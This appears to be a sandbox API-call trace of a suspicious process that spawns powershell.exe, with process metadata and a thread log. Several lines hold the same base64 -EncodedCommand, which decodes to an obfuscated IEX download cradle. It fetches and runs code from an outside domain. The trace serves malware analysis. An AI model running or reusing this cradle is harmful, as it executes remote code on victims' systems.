	[0338.159] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.159] SetErrorMode (uMode=0x1) returned 0x1
	[0338.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0338.160] SetErrorMode (uMode=0x1) returned 0x1
	[0338.160] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.160] SetErrorMode (uMode=0x1) returned 0x1
	[0338.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0338.160] SetErrorMode (uMode=0x1) returned 0x1
	[0338.160] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.161] SetErrorMode (uMode=0x1) returned 0x1
	[0338.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0338.161] SetErrorMode (uMode=0x1) returned 0x1
	[0338.161] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.161] SetErrorMode (uMode=0x1) returned 0x1
	[0338.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0338.162] SetErrorMode (uMode=0x1) returned 0x1
	[0338.162] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.162] SetErrorMode (uMode=0x1) returned 0x1
	[0338.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0338.162] SetErrorMode (uMode=0x1) returned 0x1
	[0338.162] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.163] SetErrorMode (uMode=0x1) returned 0x1
	[0338.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0338.163] SetErrorMode (uMode=0x1) returned 0x1
	[0338.163] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.163] SetErrorMode (uMode=0x1) returned 0x1
	[0338.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0338.164] SetErrorMode (uMode=0x1) returned 0x1
	[0338.164] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.164] SetErrorMode (uMode=0x1) returned 0x1
	[0338.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0338.164] SetErrorMode (uMode=0x1) returned 0x1
	[0338.165] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.165] SetErrorMode (uMode=0x1) returned 0x1
	[0338.165] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0338.165] SetErrorMode (uMode=0x1) returned 0x1
	[0338.165] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.165] SetErrorMode (uMode=0x1) returned 0x1
	[0338.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0338.166] SetErrorMode (uMode=0x1) returned 0x1
	[0338.166] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.166] SetErrorMode (uMode=0x1) returned 0x1
	[0338.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0338.166] SetErrorMode (uMode=0x1) returned 0x1
	[0338.167] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.167] SetErrorMode (uMode=0x1) returned 0x1
	[0338.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0338.167] SetErrorMode (uMode=0x1) returned 0x1
	[0338.167] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x309f30
	[0338.168] FindNextFileW (in: hFindFile=0x309f30, lpFindFileData=0x1c7ae030 | out: lpFindFileData=0x1c7ae030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0338.168] FindClose (in: hFindFile=0x309f30 | out: hFindFile=0x309f30) returned 1
	[0338.169] SetErrorMode (uMode=0x1) returned 0x1
	[0338.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c7ae140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0338.170] SetErrorMode (uMode=0x1) returned 0x1
	[0338.170] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c7ae350 | out: lpFileInformation=0x1c7ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0338.170] SetErrorMode (uMode=0x1) returned 0x1
	[0338.171] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0338.171] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0338.171] CoTaskMemFree (pv=0x2a1760) 
	[0338.172] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0338.172] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0338.172] CoTaskMemFree (pv=0x2a1760) 
	[0338.176] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0338.176] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0338.176] CoTaskMemFree (pv=0x2a1760) 
	[0338.647] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0338.647] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0338.647] CoTaskMemFree (pv=0x2a1760) 
	[0338.660] CoTaskMemAlloc (cb=0x3b) returned 0x1b7472b0
	[0338.660] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c7ae538, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c7ae538) returned 0x4550
	[0338.661] CoTaskMemFree (pv=0x1b7472b0) 
	[0338.664] GetConsoleWindow () returned 0x20204
	[0338.673] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0338.673] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0338.673] CoTaskMemFree (pv=0x2a1760) 
	[0338.674] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0338.674] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0338.674] CoTaskMemFree (pv=0x2a1760) 
	[0339.089] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0339.089] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0339.089] CoTaskMemFree (pv=0x2a1760) 
	[0339.091] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c7ae580 | out: pNumArgs=0x1c7ae580) returned 0x2f5a20*=""
	[0339.093] lstrlenW (lpString="-EncodedCommand") returned 15
	[0339.093] CoTaskMemAlloc (cb=0x22) returned 0x1b749610
	[0339.093] RtlMoveMemory (in: Destination=0x1b749610, Source=0x2f5a42, Length=0x20 | out: Destination=0x1b749610) 
	[0339.094] CoTaskMemFree (pv=0x1b749610) 
	[0339.094] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0339.094] CoTaskMemAlloc (cb=0x2f4) returned 0x1b735b10
	[0339.094] RtlMoveMemory (in: Destination=0x1b735b10, Source=0x2f5a62, Length=0x2f2 | out: Destination=0x1b735b10) 
	[0339.094] CoTaskMemFree (pv=0x1b735b10) 
	[0339.095] LocalFree (hMem=0x2f5a20) returned 0x0
	[0339.095] CoTaskMemAlloc (cb=0x804) returned 0x1b753190
	[0339.095] GetConsoleTitleW (in: lpConsoleTitle=0x1b753190, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0339.096] CoTaskMemFree (pv=0x1b753190) 
	[0339.105] CoTaskMemAlloc (cb=0x38e) returned 0x2f5a20
	[0339.105] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c7ae4e0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2f96370 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2f96370*(hProcess=0x364, hThread=0x360, dwProcessId=0xcb0, dwThreadId=0xb78)) returned 1
	[0339.539] CoTaskMemFree (pv=0x2f5a20) 
	[0339.541] CloseHandle (hObject=0x360) returned 1
	[0339.541] CoTaskMemAlloc (cb=0x3b) returned 0x1b7472b0
	[0339.541] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c7ae588, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c7ae588) returned 0x4550
	[0339.542] CoTaskMemFree (pv=0x1b7472b0) 
	[0339.545] GetCurrentProcess () returned 0xffffffffffffffff
	[0339.545] GetCurrentProcess () returned 0xffffffffffffffff
	[0339.546] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x364, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c7ae668, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c7ae668*=0x360) returned 1

Process:
	id = "14"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x30143000"
	os_pid = "0x9fc"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 84
	os_tid = 0x9f8

	[0269.502] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0272.681] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0272.681] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0272.681] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0272.681] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0277.297] GetVersionExW (in: lpVersionInformation=0x1cdda0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cdda0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0277.299] GetVersionExW (in: lpVersionInformation=0x1cdda0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cdda0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0277.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.312] GetVersionExW (in: lpVersionInformation=0x1cdb10*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cdb10*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0277.313] SetErrorMode (uMode=0x1) returned 0x1
	[0277.314] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1cdc70 | out: lpFileInformation=0x1cdc70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0277.315] SetErrorMode (uMode=0x1) returned 0x1
	[0277.318] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1cdee0 | out: lpdwHandle=0x1cdee0) returned 0x94c
